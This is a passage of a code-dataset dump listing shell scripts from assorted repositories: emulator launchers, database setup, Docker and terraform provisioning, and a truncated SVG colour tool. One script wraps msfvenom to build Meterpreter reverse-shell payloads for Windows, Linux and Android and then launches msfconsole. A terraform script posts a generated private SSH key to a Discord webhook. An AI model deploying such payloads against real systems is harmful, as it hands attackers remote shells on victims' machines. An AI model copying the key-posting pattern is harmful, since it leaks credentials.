blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 4 115 | path stringlengths 2 970 | src_encoding stringclasses 28 values | length_bytes int64 31 5.38M | score float64 2.52 5.28 | int_score int64 3 5 | detected_licenses listlengths 0 161 | license_type stringclasses 2 values | text stringlengths 31 5.39M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
1339dd6ff1cb248bfe4192c03eb394903a56433b | Shell | nculwell/Taskmaster | /server/recreatedb.sh | UTF-8 | 294 | 2.515625 | 3 | [] | no_license | #!/bin/sh
# Recreates the Taskmaster PostgreSQL database from scratch.
# Sending stdout to /dev/null gets rid of success messages,
# leaving error (and notice) messages to get displayed.
echo Drop and recreate database.
# Runs psql as the postgres superuser; abort the script if drop/create fails.
su postgres -c "psql -f dropandcreatedb.sql" || exit 1
echo Create schema.
# Schema is loaded as the application user; only errors/notices are shown.
su nate -c "psql -d taskmaster -f dbsetup.sql" >/dev/null
| true |
56bf8d2edf022aba6ec2166d1a8fa7f1ba97b1e8 | Shell | cvpcs/gentoo-overlay | /games-emulation/epsxe/files/epsxe | UTF-8 | 2,035 | 3.4375 | 3 | [] | no_license | #!/bin/sh
PSEMUDIR=GAMES_LIBDIR/psemu
EPSXEDIR=GAMES_PREFIX_OPT/epsxe
mkdir -p ~/.epsxe
cd ~/.epsxe
cleanlinks
mkdir -p memcards bios cfg cheats snap sstates patches plugins
shopt -s nullglob
for f in `find "${EPSXEDIR}" -maxdepth 1 -type f -printf '%f '` ; do
[[ -e "${f}" ]] && continue
ln -s "${EPSXEDIR}/${f}" "${f}" >& /dev/null
done
if [[ -d "${PSEMUDIR}" ]] ; then
if [[ -d "${PSEMUDIR}/plugins" ]] ; then
for plugin in `find "${PSEMUDIR}/plugins" -maxdepth 1 -type f -printf '%f '` ; do
if [[ ! -e "plugins/${plugin}" ]] ; then
echo "Loading new plugin: ${plugin}"
ln -s "${PSEMUDIR}/plugins/${plugin}" "plugins/${plugin}"
fi
done
fi
if [[ -d "${PSEMUDIR}/cfg" ]] ; then
for configlib in `find "${PSEMUDIR}/cfg" -maxdepth 1 -iname '*.cfg' -prune -o -type f -printf '%f '`; do
if [[ ! -e "cfg/${configlib}" ]] ; then
echo "Loading config utility: ${configlib}"
ln -s "${PSEMUDIR}/cfg/${configlib}" "cfg/${configlib}"
fi
done
for config in `find "${PSEMUDIR}/cfg" -maxdepth 1 -iname '*.cfg' -type f -printf '%f '`; do
if [[ ! -e "cfg/${config}" ]] ; then
echo "Loading default config: ${config}"
cp "${PSEMUDIR}/cfg/${config}" "cfg/${config}"
fi
done
fi
if [[ -d "${PSEMUDIR}/cheats" ]] ; then
for cheat in `find "${PSEMUDIR}/cheats" -maxdepth 1 -type f -printf '%f '`; do
if [[ ! -e "cheats/${cheat}" ]] ; then
ln -s "${PSEMUDIR}/cheats/${cheat}" "cheats/${cheat}"
fi
done
fi
if [[ -d "${PSEMUDIR}/bios" ]] ; then
for bios in `find "${PSEMUDIR}/bios" -maxdepth 1 -type f -printf '%f '`; do
if [[ ! -e "bios/${bios}" ]] ; then
ln -s "${PSEMUDIR}/bios/${bios}" "bios/${bios}"
fi
done
fi
fi
# check for bios
if [[ -z "`cd bios && ls`" ]] ; then
# if the bios directory is empty, then ... well ...
echo
echo "*** Put your BIOS file into ~/.epsxe/bios/"
echo " or ePSXe may not work!"
echo
fi
# execute program (with args)
export LD_PRELOAD="libpthread.so.0:${LD_PRELOAD}" # fix for Bug #26121
exec ./epsxe "$@"
| true |
810b5eb7d82153a5118d4da01f9ab486d6af252d | Shell | Honga1/discriminator | /src/chapters/chapter3/Part2Screen3/audio/convert.sh | UTF-8 | 182 | 3.03125 | 3 | [] | no_license | for i in *.mp3;
do name=$(echo "$i" | cut -d'.' -f1)
echo "$name"
ffmpeg -i "$i" -c:a libopus -b:a 128k "${name}.caf"
ffmpeg -i "$i" -c:a libopus -b:a 128k "${name}.ogg"
done | true |
53c5591a2e99cbbdf92f9d36c1b4e434e46497bb | Shell | AhmedSakrr/marla-server | /src/feed.sh | UTF-8 | 175 | 2.609375 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# Emit a minimal HTTP/1.1 GET request on stdout, then copy the response
# body lines (read from stdin) into the file REP.
# NOTE(review): $port is expected to be exported by the caller -- confirm.
echo -en "GET / HTTP/1.1\r\n"
echo -en "Host: localhost:$port\r\n"
echo -en "\r\n"
# Split input on newlines only (IFS set to a literal newline).
IFS='
'
# First line of the response is the HTTP status line; it is discarded.
read statusline
# NOTE(review): this loop never terminates -- after EOF `read` keeps
# failing but the loop continues, appending empty lines to REP forever.
while true; do
read line
echo $line>>REP
done
| true |
9597d815930eadcea1989ef2b3016878e65209e7 | Shell | jeffduda/brain-behavior-change-processing | /Reconstruction/ME_rmsdiff.sh | UTF-8 | 1,569 | 3.640625 | 4 | [] | no_license | #!/bin/bash
# ---------------------------------------------------------------
# ME_RMSDIFF
#
# Use FSL's rmsdiff command to compute motion metrics on a list of xform matrices
#
# Created: M Elliott 8/2012
# ---------------------------------------------------------------
# Print a blank-line-padded usage synopsis and abort with status 1.
Usage() {
printf '\nUsage: %s <outfile_root> <refvol> matfile1 matfile2 ... matfileN\n\n' "$(basename "$0")"
exit 1
}
# --- argument handling -------------------------------------------------
# Need at least: <outfile_root> <refvol> and two matrix files.
if [ $# -lt 4 ]; then
Usage
fi
# Output files derived from the user-supplied root name.
outroot=$1
absfile=${outroot}_abs.rms
relfile=${outroot}_rel.rms
absmean=${outroot}_abs_mean.rms
relmean=${outroot}_rel_mean.rms
refvol=$2
# Drop outroot and refvol so "$@" holds only the matrix files.
shift
shift
# Identity transform written to a uniquely-named temp file; rmsdiff of a
# matrix against identity yields the volume's absolute displacement.
ident_matrix=ident_mat_${RANDOM}.txt
cat << 'EOF' > $ident_matrix
1.000000 0.000000 0.000000 0.000000
0.000000 1.000000 0.000000 0.000000
0.000000 0.000000 1.000000 0.000000
0.000000 0.000000 0.000000 1.000000
EOF
# compute abs and rel RMS metrics from matrices
rm -f $absfile $relfile
last_mat=$ident_matrix
count=0
for matfile in $@ ; do
echo -n "."
# compute absolute RMS displacement from reference volume
${FSLDIR}/bin/rmsdiff $ident_matrix $matfile $refvol >> $absfile
# compute relative RMS displacement from previous volume
# (skipped for the first volume, which has no predecessor)
if [ $count -gt "0" ] ; then
${FSLDIR}/bin/rmsdiff $last_mat $matfile $refvol >> $relfile
fi
let count=$count+1
last_mat=$matfile
done
# compute means of abs and rel
# nvols = volumes processed; 1dsum (AFNI) totals each file's column.
nvols=`cat $absfile | wc -l`
abssum=`1dsum $absfile`
relsum=`1dsum $relfile`
# bc with scale=6 gives six decimal places; the relative mean divides by
# nvols-1 because the first volume produced no relative measurement.
echo "scale=6 ; $abssum/$nvols" | bc > $absmean
echo "scale=6 ; $relsum/($nvols-1)" | bc > $relmean
# clean up
echo ""
rm -f $ident_matrix
exit 0
| true |
c2b3eceb306f11b2fac34db4ffe139e50f29ad4c | Shell | louismeunier/statistics | /scripts/generate_all_statistics.sh | UTF-8 | 326 | 2.71875 | 3 | [] | no_license | #!/bin/bash
# Regenerate all statistics against the locally running statistics server.
# server must be running
# Port defaults to 8080 unless STATISTICS_PORT is set in the environment.
port=${STATISTICS_PORT:-8080}
# Download db export
./scripts/get_db_export.sh
echo "Deleting existing statistics"
# Clear out previous results before regenerating.
curl -X DELETE "http://localhost:${port}/statistics" -H "accept: */*"
# Sql stats
./scripts/generate_sql_statistics.sh
# Python
./scripts/generate_python_statistics.sh
| true |
01164a0f64f3842870674b99df3d6414e2bb9159 | Shell | nicholasjackson/docker-consul-envoy | /compatibility/test.sh | UTF-8 | 1,489 | 3.25 | 3 | [
"MIT"
] | permissive | #!/bin/bash
echo "Testing Consul Envoy Compatibility"
echo ""
echo "Consul Version | Envoy Version | Routing | Traffic Split"
echo "-------------- | ------------- | ------- | -------------"
#consul_version=("1.8.3" "1.8.2" "1.8.0" "1.7.2")
#envoy_version=("1.15.0" "1.14.4" "1.14.2" "1.13.2" "1.13.1" "1.13.0" "1.12.4" "1.12.3" "1.11.2" "1.10.0")
consul_version=("1.12.2" "1.12.0" "1.11.2" "1.10.7" "1.10.0" "1.9.5" "1.9.3" "1.9.2" "1.8.3" "1.8.2" "1.8.1" "1.8.0" "1.7.4" "1.7.3" "1.7.2")
envoy_version=("1.22.2" "1.22.1" "1.22.0" "1.21.2" "1.20.1" "1.18.1" "1.18.4" "1.18.3" "1.17.1" "1.16.2" "1.16.0" "1.15.3" "1.15.0" "1.14.4" "1.14.2" "1.13.4" "1.13.2" "1.13.1" "1.13.0" "1.12.6" "1.12.4" "1.12.3" "1.11.2" "1.10.0")
#consul_version=("1.8.2")
#envoy_version=("1.13.0")
for c in ${consul_version[@]};do
for e in ${envoy_version[@]};do
ENVOY_VERSION=$e CONSUL_VERSION=$c shipyard run ./consul-docker > /dev/null 2>&1
routing=FAIL
splitting=FAIL
for i in {1..30}; do
$(curl -s localhost:9090 -H "x-version:2" | grep -q "Backend_Service 2")
if [ $? == 0 ]; then
routing=PASS
fi
$(curl -s localhost:9090 | grep -q "Backend_Service 1")
if [ $? == 0 ]; then
splitting=PASS
fi
if [[ "${routing}" == "PASS" && "$splitting" == "PASS" ]]; then
break
fi
sleep 1
done
printf "%14s | %13s | %7s | %13s\n" $c $e $routing $splitting
shipyard destroy > /dev/null 2>&1
done
done;
| true |
9056e99ac42b94e533b2d73f21fb8da24231df70 | Shell | Goutham-hub605/payload-generator | /generate.sh | UTF-8 | 998 | 2.984375 | 3 | [
"MIT"
] | permissive | #!/bin/bash
echo " only for educational purpose"
echo "(1) windows payload"
echo "(2) linux payload"
echo "(3)android payload"
echo ""
read -p "Enter you number: " pay
echo ""
echo""
echo "Pls wait"
if [ $pay == 1 ]
then
echo "Creating payload for windows"
read -p "Enter your lhost: " s
read -p "Enter your lport: " s1
read -p "Enter you payload name: " z
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$s LPORT=$s1 -f exe -o $z.exe
elif [ $pay == 2 ]
then
read -p "Enter your lhost: " s
read -p "Enter your lport: " s1
read -p "Enter you payload name: " z
msfvenom -p linux/meterpreter/reverse_tcp LHOST=$s LPORT=$s1 -f elf -o $z.elf
echo ""
else
read -p "Enter your lhost: " s
read -p "Enter your lport: " s1
read -p "Enter you payload name: " z
msfvenom -p android/meterpreter/reverse_tcp LHOST=$s LPORT=$s1 -f raw -o $z.apk
echo "thank you for using"
fi
read -p "Do you want start listener(yes,no)" a
if [ $a == yes ]
then
msfconsole
else
echo ""
echo "thanks for using"
fi
| true |
ca81df7233bfb61e144d2df81819c1ffd7da43c8 | Shell | thamjieying/ShellScriptTutorial | /lesson23.sh | UTF-8 | 292 | 3.59375 | 4 | [] | no_license | #! /bin/bash
# Functions
# function name(){
# command1
# }
# name (){
# command1
# }
# Demo function: echoes every argument on one line, then the first and
# second arguments each on their own line.
print(){
echo $@  # all arguments, space-joined
echo $1  # just the first argument
echo $2  # just the second argument
}
# Announce termination, then exit the shell with the status of the
# preceding command (0 here, since printf succeeds).
quit(){
printf '%s\n' "quitting"
exit
}
print "hello" "foo"
quit
echo "This should not be called" | true |
e398b62630e0b1a810f58eaec76b588d4f214b4a | Shell | ashish456747/shell-scripting | /variables.sh | UTF-8 | 185 | 2.859375 | 3 | [
"MIT"
] | permissive | #! /bin/bash
# Demonstration of built-in shell variables exposed by bash.
#SYSTEM VARIABLES
echo $BASH
echo The bash version is $BASH_VERSION
echo $PWD
echo $HOME
# Variables assigned by the script itself (note: no spaces around "=").
#USER DEFINED VARIABLES
name=MARK
age=10
echo The name is $name and age is $age
| true |
888477c3d9c6fe2f24a4f9a7a8b76badedbf5e1b | Shell | mi11km/setup-isucon-aws-env | /terraform/setup.sh | UTF-8 | 988 | 3.421875 | 3 | [] | no_license | #!/bin/bash
webhook_url= # todo set discord webhook url
ssh_key_name=id_rsa_ec2
number_of_server=4
username=ubuntu
# send_ip AMI_ID
# Runs "terraform apply" with the given AMI, scrapes the last
# $number_of_server IPv4 addresses from its output, posts an ssh connect
# command for each to the Discord webhook, and echoes it locally.
# NOTE(review): posting connection details (and, later in this script,
# the private key) to a chat webhook leaks infrastructure secrets; make
# sure the target channel is private.
send_ip() {
ip=($(terraform apply -auto-approve -var "ami_id=$1" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | tail -${number_of_server} | tr '\n' ' '))
# send ssh connect command to discord channel
# shellcheck disable=SC2068
for i in ${ip[@]}; do
curl -X POST \
-H "Content-Type: application/json" \
-d '{"username": "ip addressだよー", "content": "ssh -i '${ssh_key_name}' '${username}'@'$i'"}' \
${webhook_url}
echo "ssh -i $ssh_key_name $username@$i"
done
echo "sudo -i -u isucon"
}
ssh-keygen -t rsa -f $ssh_key_name
terraform init
terraform fmt
terraform validate
if [ $# -ne 1 ]; then
send_ip ami-03bbe60df80bdccc0
else
send_ip $1
fi
# send ssh secret key to discord channel
curl -F 'payload_json={"content": "洩らしちゃだめよ"}' \
-F "file1=@${ssh_key_name}" \
${webhook_url}
| true |
70b891c7ff212eaffbef2b52d82b1c998fe5c52b | Shell | supreet-s8/SPRINT | /Contact_US/Contact_US.sh | UTF-8 | 2,217 | 2.78125 | 3 | [] | no_license | #!/bin/sh
##Script will fetch mail from rubix database Descending Order.
#CNT_1=`ssh -q root@10.23.80.136 "java -jar /opt/tms/nae-spw/WEB-INF/lib/sqltool-2.2.9.3.jar --driver=org.hsqldb.jdbcDriver --sql='SELECT * FROM CONTACTUS ORDER BY ID DESC;' rubix "|sed 1d|sed 1d |awk '{print $1}'|head -1`
CNT_1=`ssh -q root@10.23.80.136 "java -jar /opt/tms/nae-spw/WEB-INF/lib/sqltool-2.2.9.3.jar --driver=org.hsqldb.jdbcDriver --sql='SELECT * FROM CONTACTUS ORDER BY ID DESC;' rubix "|sed 1d|sed 1d |awk '{print $1}'| head -1`
CNT_2=`cat /data/offshore_support/Contact_US/CONTACTUS.txt | head -1`
echo $CNT_2
if [ $CNT_1 -ne $CNT_2 ]
then
CNT=`ssh -q root@10.23.80.136 "java -jar /opt/tms/nae-spw/WEB-INF/lib/sqltool-2.2.9.3.jar --driver=org.hsqldb.jdbcDriver --sql='SELECT * FROM CONTACTUS WHERE ID >'$CNT_2' ORDER BY ID DESC;' rubix "|sed 1d|sed 1d |awk '{print $1}'`
echo "$CNT" > /data/offshore_support/Contact_US/CONTACTUS.txt
for i in `cat /data/offshore_support/Contact_US/CONTACTUS.txt`
do
ssh -q root@10.23.80.136 "java -jar /opt/tms/nae-spw/WEB-INF/lib/sqltool-2.2.9.3.jar --driver=org.hsqldb.jdbcDriver --sql='SELECT * FROM CONTACTUS WHERE ID ='$i' ORDER BY ID DESC;' rubix " >/data/offshore_support/Contact_US/mail.txt
USR=`cat /data/offshore_support/Contact_US/mail.txt |sed 1d|sed 1d |awk '{print $4}'`
echo "$USR"
USR1=`ssh -q root@10.23.80.136 "java -jar /opt/tms/nae-spw/WEB-INF/lib/sqltool-2.2.9.3.jar --driver=org.hsqldb.jdbcDriver --sql=\"SELECT EMAIL FROM USER WHERE USERNAME = '$USR';\" rubix "`
echo "$i "
echo "$USR1"
SUBJECT=`ssh -q root@10.23.80.136 "java -jar /opt/tms/nae-spw/WEB-INF/lib/sqltool-2.2.9.3.jar --driver=org.hsqldb.jdbcDriver --sql='SELECT SUBJECT FROM CONTACTUS WHERE ID ='$i';' rubix "`
BODY=`ssh -q root@10.23.80.136 "java -jar /opt/tms/nae-spw/WEB-INF/lib/sqltool-2.2.9.3.jar --driver=org.hsqldb.jdbcDriver --sql='SELECT BODY FROM CONTACTUS WHERE ID ='$i';' rubix "`
echo "$BODY" > /data/offshore_support/Contact_US/mail.txt
cat /data/offshore_support/Contact_US/mail.txt |tr -d \\r |mail -s "$SUBJECT" -b kevin.keschinger@guavus.com -b samuel.joseph@guavus.com -b erik.maxwell@guavus.com -b mohsin.ali@guavus.com -r "$USR1" NAE_UI_SUPPORT@sprint.com
sleep 3
done
else
echo "no New mail"
fi
| true |
1f864630b3e933f1b44c251d98dfb3d42d8cc046 | Shell | loceee/OSXCasperScripts | /cfgScripts/cfgsysAddPrinterAdmin.sh | UTF-8 | 273 | 3 | 3 | [] | no_license | #!/bin/bash
# pass it a domain group, or default to everyone (all user accounts on computers)
# everyone is good for staff / student macs
#
# $4 is the Casper/Jamf script-parameter slot for the first custom argument.
group="${4}"
# BUGFIX: the default was previously assigned to a misspelled variable
# ("countycode"), so an empty $4 left $group empty; assign to group itself.
[ -z "${group}" ] && group="everyone"
# Grant printer-administration rights by adding the group to lpadmin.
dseditgroup -o edit -n /Local/Default -a "${group}" -t group lpadmin
exit 0
| true |
439ecb55c0744a7aeb98409a2952d85dcbdc63dd | Shell | schlitzered/pylogchop | /contrib/init.d/pylogchop | UTF-8 | 536 | 2.953125 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
source /opt/rh/rh-python34/enable
start() {
pylogchop start
}
stop() {
pylogchop quit
}
reload() {
pylogchop reload
}
case "$1" in
start)
start
;;
stop)
stop
;;
reload)
reload
;;
restart)
stop
start
;;
*)
echo "Usage: $0 {start|stop|restart}"
exit 1
;;
esac
exit 0 | true |
7adf86063c17c8e32a126ce5add7534094614a37 | Shell | jhass/PKGBUILDs | /shards-git/PKGBUILD | UTF-8 | 1,002 | 2.75 | 3 | [] | no_license | # Maintainer: Jonne Haß <me@jhass.eu>
pkgname=shards-git
pkgver=v0.17.3.r2.geac9adf
pkgrel=1
pkgdesc="The package manager for the Crystal language (git version)"
arch=('x86_64' 'aarch64')
url="https://github.com/crystal-lang/shards"
license=('Apache')
conflicts=('shards')
provides=('shards')
depends=('libyaml' 'git' 'libevent' 'gc')
optdepends=('fossil')
makedepends=('crystal')
checkdepends=('fossil')
source=("git+https://github.com/crystal-lang/shards.git")
pkgver() {
cd "$srcdir/${pkgname/-git/}"
( set -o pipefail
git describe --long --tags 2>/dev/null | sed 's/\([^-]*-g\)/r\1/;s/-/./g' ||
printf "r%s.%s" "$(git rev-list --count HEAD)" "$(git rev-parse --short HEAD)"
)
}
build() {
cd "${pkgname/-git/}"
make CRYSTAL_OPTS="--release"
}
check() {
cd "${pkgname/-git/}"
./bin/shards install
make test
}
package() {
cd "${pkgname/-git/}"
make install PREFIX="$pkgdir/usr"
install -Dm644 LICENSE "$pkgdir/usr/share/licenses/$pkgname/LICENSE"
}
sha256sums=('SKIP')
| true |
f6cd58197e9b0a5eadfd9edba6c0fcddb7240a91 | Shell | MaritimeResearchInstituteNetherlands/VisTrails | /vistrails/tests/run_on_mac.sh | UTF-8 | 531 | 3.5 | 4 | [
"BSD-3-Clause"
] | permissive | #!/bin/bash
# Validate arguments: the first positional argument is the .app bundle path.
if [ -z "$1" ]
then
echo "usage: $0 <app_path>"
exit 65
fi
APP_PATH=$1
# Remaining arguments are forwarded to the test suite.
shift
THIS_DIR=`dirname $0`
# Well-known locations inside a macOS .app bundle.
PYTHON_EXEC_PATH="Contents/MacOS/python"
RESOURCES_PATH="Contents/Resources"
# Distinct exit codes (66/67) identify which bundle piece is missing.
if [ ! -e "$APP_PATH/$RESOURCES_PATH" ]
then
echo "$APP_PATH/$RESOURCES_PATH does not exist"
exit 66
fi
if [ ! -e "$APP_PATH/$PYTHON_EXEC_PATH" ]
then
echo "$APP_PATH/$PYTHON_EXEC_PATH does not exist"
exit 67
fi
# Run the suite with the bundled python, pointing PYTHONHOME at the
# bundle's Resources so the app's packaged libraries are used.
PYTHONHOME="$APP_PATH/$RESOURCES_PATH" ${APP_PATH}/${PYTHON_EXEC_PATH} ${THIS_DIR}/runtestsuite.py $@
| true |
4c301b729a6ec835aa264df6f3d96bd6714b7e95 | Shell | akatsos/harokopio-apt-station | /WeatherDir/scripts/delete_audio_maps_passes.sh | UTF-8 | 437 | 2.734375 | 3 | [
"MIT"
] | permissive | #!/bin/bash
#Deletes older than 1 day audio files(wav) ,maps(png) and passes
#Is scheduled to run every Monday and Thursday with a cronjob
#This happens so the RaspPi never runs out of storage space
# -mtime +1 matches files last modified more than one day ago.
find /home/pi/WeatherDir/maps -type f -mtime +1 -name '*.png' -delete
find /home/pi/WeatherDir/audio -type f -mtime +1 -name '*.wav' -delete
# Passes are per-pass directories; remove each old top-level dir whole.
find /home/pi/WeatherDir/passes -mindepth 1 -maxdepth 1 -type d -mtime +1 -exec rm -rf {} \;
| true |
1a8cb6a9711aeaae607e3402a745d5e60a164ae1 | Shell | shubh0209/Project1 | /script.sh | UTF-8 | 533 | 2.515625 | 3 | [] | no_license | #!/bin/bash
sudo yum update -y
sudo yum install docker -y
sudo systemctl enable docker
sudo systemctl start docker
sudo mkdir -p /nginx
cd /nginx
sudo bash -c "echo 'Hello World, I am nginx server which serves static content, running using docker on ec2 instance managed by terraform and build using jenkins, deployed in CICD pipe
line, triggered by a GIT push to master branch.' > index.html"
sudo docker run -d -p 80:80 -v /nginx/:/usr/share/nginx/html/ --name nginx nginx
sudo docker run -d -p 8080:8080 shubh228/simple-nodejs:v1 | true |
7fd68b1f061f15310b6f719ca13e201a95cfa03a | Shell | fenixdecorare/fenix-brand | /preppng.sh | UTF-8 | 25,463 | 3.09375 | 3 | [] | no_license | #!/bin/bash
PROGNAME=${0##*/}
currentsvgcolors()
{
# Color schema baseado no estudo feito em http://colorschemedesigner.com
# representa as cores actuais nos svg obtidas com -f
# [IMPORTANTE] Altere manualmente after -[ce]? para mudar svgs
# [IMPORTANTE] All svg's have to be passed throught:
# inkscape -l new.svg old.svg (inkscape svg format)
# the inkscape svg format is necessary for this script
# the fill:<color> format is used in this script
# optionaly you can save as plain svg (inkscape gui)
# [IMPORTANTE] svgz em aws precisam content-encoding http header set to gzip
# Numero total de cores no palette fenix (USADO EM TODO SCRIPT)
j=0
j=`expr $j + 1`;vco[$j]="#333333";dco[$j]="cinza" #c1
j=`expr $j + 1`;vco[$j]="#f7f7f7";dco[$j]="white" #c2
j=`expr $j + 1`;vco[$j]="#dc0000";dco[$j]="660000:h+0.000s+0.000l+0.231" #c3
j=`expr $j + 1`;vco[$j]="#a10000";dco[$j]="660000:h+0.000s+0.000l+0.116" #c4
j=`expr $j + 1`;vco[$j]="#660000";dco[$j]="brand-primary" #c5
j=`expr $j + 1`;vco[$j]="#006666";dco[$j]="660000:h+0.500s+0.000l+0.000" #c6
j=`expr $j + 1`;vco[$j]="#999900";dco[$j]="660000:h+0.167s+0.000l+0.100:brand-info" #c7
j=`expr $j + 1`;vco[$j]="#660033";dco[$j]="660000:h+0.917s+0.000l+0.000" #c8
j=`expr $j + 1`;vco[$j]="#330066";dco[$j]="660000:h+0.750s+0.000l+0.000" #c9
j=`expr $j + 1`;vco[$j]="#cc9966";dco[$j]="brand-warning" #c10
j=`expr $j + 1`;vco[$j]="#006633";dco[$j]="brand-success" #c11
j=`expr $j + 1`;vco[$j]="#e45353";dco[$j]="brand-danger" #c12
j=`expr $j + 1`;vco[$j]="#cccccc";dco[$j]="333333:h+0.000s+0.000l+0.600:cinza-logo" #c13
}
setschema()
{
r1="Color::RGB.from_html";r2="puts Color::HSL.from_fraction";rb="ruby -r color -e "
h=".to_hsl.h";s=".to_hsl.s";l=".to_hsl.l"
u="c=$r1('${aco[1]}')"
n=`expr $n + 4`;aco[$n]=`$rb"$u;$r2(c$h+0.000,c$s+0.000,c$l+0.600).html"`
}
setschemafenixs()
{
r1="Color::RGB.from_html";r2="puts Color::HSL.from_fraction";rb="ruby -r color -e "
h=".to_hsl.h";s=".to_hsl.s";l=".to_hsl.l"
u="c=$r1('$c_fenix')"
n=`expr $n - 2`;aco[$n]=`$rb"$u;$r2(c$h+0.000,c$s+0.000,c$l+0.231).html"`
n=`expr $n + 1`;aco[$n]=`$rb"$u;$r2(c$h+0.000,c$s+0.000,c$l+0.116).html"`
n=`expr $n + 1`;aco[$n]="$c_fenix"
n=`expr $n + 1`;aco[$n]=`$rb"$u;$r2(c$h+0.500,c$s+0.000,c$l+0.000).html"`
n=`expr $n + 1`;aco[$n]=`$rb"$u;$r2(c$h+0.167,c$s+0.000,c$l+0.100).html"`
n=`expr $n + 1`;aco[$n]=`$rb"$u;$r2(c$h+0.917,c$s+0.000,c$l+0.000).html"`
n=`expr $n + 1`;aco[$n]=`$rb"$u;$r2(c$h+0.750,c$s+0.000,c$l+0.000).html"`
}
getschema()
{
#u="$u;(o.round(2) == s.round(2)) ? '' : l+'%+.3f' % ((o-s))"
r1="Color::RGB.from_html"
r2="puts Color::HSL.from_fraction"
u=""
u="$u;def fz(o,s,l)"
u="$u;l+'%+.3f' % (o-s)"
u="$u;end"
u="$u;co=$r1('$1');cs=$r1('$2')"
u="$u;puts co.html+':'+cs.html+':j=\`expr \$j + 1\`;vco[\$j]=\"'"
u="$u+co.html+'\";dco[\$j]=\"'+cs.html[1,6]+':'"
u="$u+fz(co.to_hsl.h,cs.to_hsl.h,'h')"
u="$u+fz(co.to_hsl.s,cs.to_hsl.s,'s')"
u="$u+fz(co.to_hsl.l,cs.to_hsl.l,'l')+'\"'"
u="$u;puts co.html+':'+cs.html+':n=\`expr \$n + 1\`;aco[\$n]=\`\$rb\"\$u;\$r2('"
u="$u+'c$'+fz(co.to_hsl.h,cs.to_hsl.h,'h')+','"
u="$u+'c$'+fz(co.to_hsl.s,cs.to_hsl.s,'s')+','"
u="$u+'c$'+fz(co.to_hsl.l,cs.to_hsl.l,'l')+').html\"\`'"
ruby -r color -e "$u"
}
showcoldest()
{
getschema "#`echo $1|cut -d":" -f1`" "#`echo $1|cut -d":" -f2`"
}
# Build, from the palette arrays vco[1..j], both:
#  - $a     : comma-separated list of quoted hex values (leading "#"
#             stripped), accumulated in reverse palette order, for
#             embedding in ruby array literals
#  - grep$$ : temp file with one hex value per line, used elsewhere as
#             a fixed-string pattern file for fgrep -f
arraypalette()
{
a="";n=1;rm -f grep$$
while [ $n -le $j ]
do p=`echo ${vco[$n]}|cut -c2-`
a=",\"$p\"$a"
echo $p >> grep$$
n=`expr $n + 1`
done
# Drop the leading comma accumulated by the loop.
a=`echo $a|cut -c2-`
}
similarsvgcolor()
{
k=`fgrep -i fill:# $1|fgrep -ivf grep$$|sed -e 's%.*fill:#\(......\).*%,"\1"%g'|sort -u`
k=`echo $k|cut -c2-|sed -e 's% %%g'`
#u="$u;(o.round(2) == s.round(2)) ? '' : l+'%.0f' % ((o*100)-(s*100))"
#u="$u;(o.round(2) == s.round(2)) ? '' : l+'o%.0f' % (o)+l+'s%.0f' % (s)"
#u="$u;(o.round(2) == s.round(2)) ? '' : l+'s%.2f' % (s)+l+'o%.2f' % (o)"
#u="$u;(o.round(2) == s.round(2)) ? '' : l+'%+.3f' % ((o-s))"
w="Paleta::Color.new(:hex"
z="Color::RGB.from_html("
u=""
u="$u;a=[$a]"
u="$u;k=[$k]"
u="$u;def sc(c,v)"
u="$u;b=v.map { |t| { k: t, sm: $w,t).similarity($w,c)) } }"
u="$u;r=b.reject { |t| t[:sm] > $m }"
u="$u;r.sort { |a,b| a[:sm] <=> b[:sm] }[0]"
u="$u;end"
u="$u;def fz(o,s,l)"
u="$u;l+'%+.3f' % (o-s)"
u="$u;end"
u="$u;f=k.map { |m| r=sc(m,a); { o: m, s: r ? r[:k] : nil, sm: r ? r[:sm] : nil } }"
u="$u;s=f.reject { |m| m[:sm].nil? }"
u="$u;n=f.reject { |m| !m[:sm].nil? }"
u="$u;s.sort! { |a,b| a[:sm] <=> b[:sm] }"
u="$u;s.each { |m| co=${z}m[:o]);cs=${z}m[:s])"
u="$u;puts m[:o]+':'+m[:s]+'|'"
u="$u+fz(co.to_hsl.h,cs.to_hsl.h,'h')"
u="$u+fz(co.to_hsl.s,cs.to_hsl.s,'s')"
u="$u+fz(co.to_hsl.l,cs.to_hsl.l,'l')"
u="$u+'sm%.2f' % m[:sm]"
u="$u }"
u="$u;n.each { |m| puts m[:o]+':'+'nao' }"
q=`ruby -r paleta -r color -e "$u"`
rs=""
rn=""
for u in $q
do if [ -z "`echo $u|fgrep nao`" ];then rs="$rs $u";else rn="$rn $u";fi
done
}
simreport()
{
arraypalette
echo "Similatiry report in $b"
for f in `ls $b`
do similarsvgcolor $b/$f
echo "$f `echo $rs|wc -w` similar, `echo $rn|wc -w` unmatched colors"
done
echo "Similatiry report in $c"
for f in `ls $c`
do similarsvgcolor $c/$f
echo "$f `echo $rs|wc -w` similar, `echo $rn|wc -w` unmatched colors"
done
rm -f grep$$
}
optsvgs()
{
echo "Optimize svgs in $b"
for f in `ls $b`
do ts=`date "+%Y%m%d%H%M%S"`
echo "Processar $f backup saved in $t/s$ts-$f"
cp $b/$f $t/s$ts-$f
inkscape -l $b/$f $t/s$ts-$f
done
echo "Optimize svgs in $c"
for f in `ls $c`
do ts=`date "+%Y%m%d%H%M%S"`
echo "Processar $f backup saved in $t/s$ts-$f"
cp $c/$f $t/s$ts-$f
inkscape -l $c/$f $t/s$ts-$f
done
}
matchscript()
{
arraypalette;similarsvgcolor $1;rm -f grep$$
for u in $rs
do u1=`echo $u|cut -d"|" -f1`
showcoldest $u1
done|sort -t : -k 3.1,3.2 -k 2,2 -k 1,1
}
matchedlist()
{
arraypalette;similarsvgcolor $1;rm -f grep$$
for u in $rs
do u1=`echo $u|cut -d":" -f1`
u2=`echo $u|cut -d":" -f2`
u3=`fgrep -i "fill:#$u1" $1|wc -l`
u4=`echo $u2|cut -d"|" -f1`
u5=`echo $u2|cut -d"|" -f2`
echo "<h1 style=\"background-color:#$u1;color:#$u4\">$u1:$u4:$u5:`printf '%03d' $u3`</h1>"
done
}
unmatchedlist()
{
arraypalette;similarsvgcolor $1;rm -f grep$$
for u in $rn
do u1=`echo $u|cut -d":" -f1`
